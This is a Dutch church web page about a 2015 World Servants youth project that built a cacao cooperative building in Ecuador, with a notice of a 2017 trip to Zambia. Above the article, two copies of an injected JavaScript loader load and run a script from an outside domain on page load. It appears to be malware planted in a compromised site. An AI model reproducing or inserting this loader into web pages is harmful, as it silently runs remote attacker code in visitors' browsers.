;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Impact World Servants project 2015 in Ecuador - PKN Damwâld

Impact World Servants project 2015 in Ecuador

Gepubliceerd op: zaterdag 8 juli 2017

In 2015 zijn drie jongeren (Gellie, Rianna en Henry) van onze gemeente met World Servants naar Ecuador afgereisd om daar te bouwen aan een cacaocentrum. Hier kunt u lezen wat voor impact deze reis heeft gehad op de lokale bevolking…

Elio Galileo Cantos is een cacaoboer in Ecuador. Toen de groep Nederlandse jongeren aankwam, viel hem op dat deze jonge mensen helemaal niet zo rijk waren als dat hij in eerste instantie dacht. Zij hadden het hele jaar door actie gevoerd om hen te kunnen komen helpen in Piedra de Plata en daarnaast maakten ze ook hun kleren vies tijdens het werk! Dit had een positieve invloed op de lokale gemeenschap, want door de inzet van de Nederlanders werden ook zij gemotiveerd om aan de slag te gaan. Ze zagen dat het niet uitmaakte tot welke klasse je behoort en welke kleur je huid is; zelfs als je blank bent of een rijke Ecuadoraan kun je iets voor de arme boeren betekenen en je handen uit de mouwen steken.

Inmiddels heeft de cacaocoöperatie de eerste oogst verwerkt in het nieuwe gebouw. Doordat de ruimte groter is kan er meer geproduceerd worden en kunnen er meer boeren zich bij de coöperatie aansluiten. Daarnaast is de gemeenschap er ook in sociaal opzicht op vooruit gegaan, omdat de opslagruimte ook als ontmoetingsruimte dient. Er worden trainingen gegeven, vergaderingen gehouden en feesten gevierd. Elio is ontzettend dankbaar dat hij dit mee heeft mogen maken. Het project bracht een grote verandering en daarmee een grote vooruitgang voor zijn dorp teweeg, wat ook zijn kinderen een beter toekomstperspectief geeft.

Deze zomer zullen 11 jongeren vanuit Damwâld en omstreken afreizen naar Zambia om daar te bouwen aan de uitbreiding van een kliniek. de jongeren vertrekken 31 juli en ze kijken er ontzettend naar uit om na een jaar lang actie voeren eindelijk te mogen vertrekken en in Zambia mogen bouwen aan verandering!

Foto's